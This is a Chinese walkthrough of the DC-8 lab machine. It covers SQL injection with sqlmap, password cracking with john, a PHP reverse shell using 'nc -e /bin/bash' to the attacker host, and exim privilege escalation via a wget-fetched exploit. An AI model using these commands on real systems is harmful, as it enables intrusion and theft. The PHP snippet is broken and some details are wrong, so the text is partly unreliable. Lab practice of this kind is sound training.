Neos的渗透测试靶机练习——DC-8

DC-8

    • 一、实验环境
    • 二、开始渗透
      • 1. 搜集信息
      • 2. sql注入
        • (1)测试注入点
        • (4)sqlmap
      • 3. PHP上传,反弹shell
      • 4. 提权
    • 三、总结


一、实验环境

虚拟机软件:VirtualBox
攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
靶机:DC-8(网卡初始为仅主机模式,要有安全意识)

二、开始渗透

1. 搜集信息

输入sudo su,将kali切换到root权限
切换为root权限
输入ifconfig查询自身ip,即攻击机ip
查自身ip
可以看到自身ip192.168.56.101
输入arp-scan -l扫描本网段存活主机,即靶机ip地址
Neos的渗透测试靶机练习——DC-8_第1张图片
可以看到靶机ip192.168.56.115,。
输入nmap -sV -p- 192.168.56.115扫描靶机所有端口开放情况
Neos的渗透测试靶机练习——DC-8_第2张图片
可以看到端口22、80是开放的。
浏览器输入192.168.56.115:80,发现是之前渗透遇到过的Drupal
Neos的渗透测试靶机练习——DC-8_第3张图片
命令行输入whatweb -v 192.168.56.114查询网站指纹信息
网站指纹
可以看到一些关键信息,其中Drupal是一个内容管理系统(CMS),版本为7
输入dirsearch -u http://192.168.56.115:80,扫描网站目录。
发现有一大串,我们增加-i 200,只显示状态码为200的结果。
输入dirsearch -u http://192.168.56.115:80 -i 200,扫描结束,我们注意到扫描出来了登陆界面http://192.168.56.115/user/login/.
Neos的渗透测试靶机练习——DC-8_第4张图片
打开登陆界面,随便输入提交没有什么特别的回显,看来需要我们通过一些方式获得用户名密码然后登陆了。
Neos的渗透测试靶机练习——DC-8_第5张图片

2. sql注入

(1)测试注入点

点击页面左边Details板块中的三个页面,发现url中有参数nid可以尝试能不能注入。
Neos的渗透测试靶机练习——DC-8_第6张图片
3改为单引号,发现回显错误信息,其中居然有sql语句
Neos的渗透测试靶机练习——DC-8_第7张图片
这已经算是敏感信息泄露了,我们继续尝试参数修改为1 and 1=1#1 and 1=2#
Neos的渗透测试靶机练习——DC-8_第8张图片
Neos的渗透测试靶机练习——DC-8_第9张图片
发现此处确实有sql注入漏洞。

(4)sqlmap

我们使用针对sql注入的自动化工具sqlmap,输入sqlmap -u "http://192.168.56.115/?nid=1" --dbs --batch,其中--dbs爆破数据库--batch默认不需要确定
Neos的渗透测试靶机练习——DC-8_第10张图片
等待一会儿,发现成功爆破出数据库d7dbinformaiotn_schema,其中d7db是用户自己创建的数据库,而information_schema是mysql版本5.0以下自带的数据库,保存用户信息。
我们继续输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db --tables --batch爆破d7db数据库的表名
Neos的渗透测试靶机练习——DC-8_第11张图片
发现出来一长串,其中有users表。我们针对users表继续爆破属性名
输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db -T users --columns,出来了结果。
Neos的渗透测试靶机练习——DC-8_第12张图片
其中name、pass应该是用户名密码,我们继续输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db -T users -C name,pass --dump
针对name、pass进行爆破。
Neos的渗透测试靶机练习——DC-8_第13张图片
爆破成功,有两个账户,adminjohn,密码是加密字符串。将这两个加密字符串写入一个文件passwd.txt,使用john工具进行爆破。
Neos的渗透测试靶机练习——DC-8_第14张图片
Neos的渗透测试靶机练习——DC-8_第15张图片
爆破出来了个turtle,经过尝试,是john的密码,admin的密码没有爆破出来,使用该用户名密码登陆网站成功。

Neos的渗透测试靶机练习——DC-8_第16张图片

3. PHP上传,反弹shell

经过浏览,发现可以上传PHP code。
Neos的渗透测试靶机练习——DC-8_第17张图片
我们这里先命令行输入nc -lvvvp 4444监听本地4444端口,然后通过写一句话PHP代码:

<?php
("nc -e /bin/bash 192.168.56.101 4444");
?> 

点击下方的save configuration保存,
Neos的渗透测试靶机练习——DC-8_第18张图片

最后重新提交Contact Us中的内容,反弹成功。
Neos的渗透测试靶机练习——DC-8_第19张图片
Neos的渗透测试靶机练习——DC-8_第20张图片

4. 提权

最后阶段了,往往都是要提权,经典操作,我们先输入python -c 'import pty;pty.spawn("/bin/bash")',切换成交互式shell。
Neos的渗透测试靶机练习——DC-8_第21张图片
然后输入find / -perm -u=s -type f 2>/dev/null查询可以以root权限执行的指令,这一步也是经典操作。
Neos的渗透测试靶机练习——DC-8_第22张图片
发现其中的exim4是一个有版本漏洞的工具,可以提权。我们先看看它的版本,输入/usr/sbin/exim4 --version查看版本。
Neos的渗透测试靶机练习——DC-8_第23张图片
好的看到版本号是4.89,我们搜索一下它的版本漏洞,输入searchsploit exim
Neos的渗透测试靶机练习——DC-8_第24张图片
发现有针对4.89版本的本地提权漏洞,那基本操作就是将46996.sh文件在靶机上运行即可。
我们先输入searchsploit -p /linux/local/46996.sh查找它的路径是什么。
Neos的渗透测试靶机练习——DC-8_第25张图片
然后根据其路径复制在当前目录上,输入cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh,然后打开一个http服务,输入python -m http.server 8800,8800为端口号。
Neos的渗透测试靶机练习——DC-8_第26张图片
然后靶机进入/tmp目录,输入wget http://192.168.56.101:8800/46996.sh ,将46996.sh传到靶机上。
Neos的渗透测试靶机练习——DC-8_第27张图片
上传成功,我们给46996.sh文件赋予权限777,使其得以执行。
Neos的渗透测试靶机练习——DC-8_第28张图片
经查看46996.sh文件内容,了解到其用法。
Neos的渗透测试靶机练习——DC-8_第29张图片
输入./46996.sh -m netcat,提权成功。
Neos的渗透测试靶机练习——DC-8_第30张图片
在/root目录下找到flag找到最终flag。
Neos的渗透测试靶机练习——DC-8_第31张图片

至此,渗透结束。


三、总结

本次渗透测试总体来讲感觉比较简单,基本都是我们之前用过的技巧,思路也基本相同,因为我们已经渐入佳境,慢慢的将一些操作变为本能,到哪一步干什么事,都变得愈发熟练起来,这正是我们逐渐变强的标志。


你可能感兴趣的:(靶场练习,网络,服务器,渗透测试,安全,网络安全)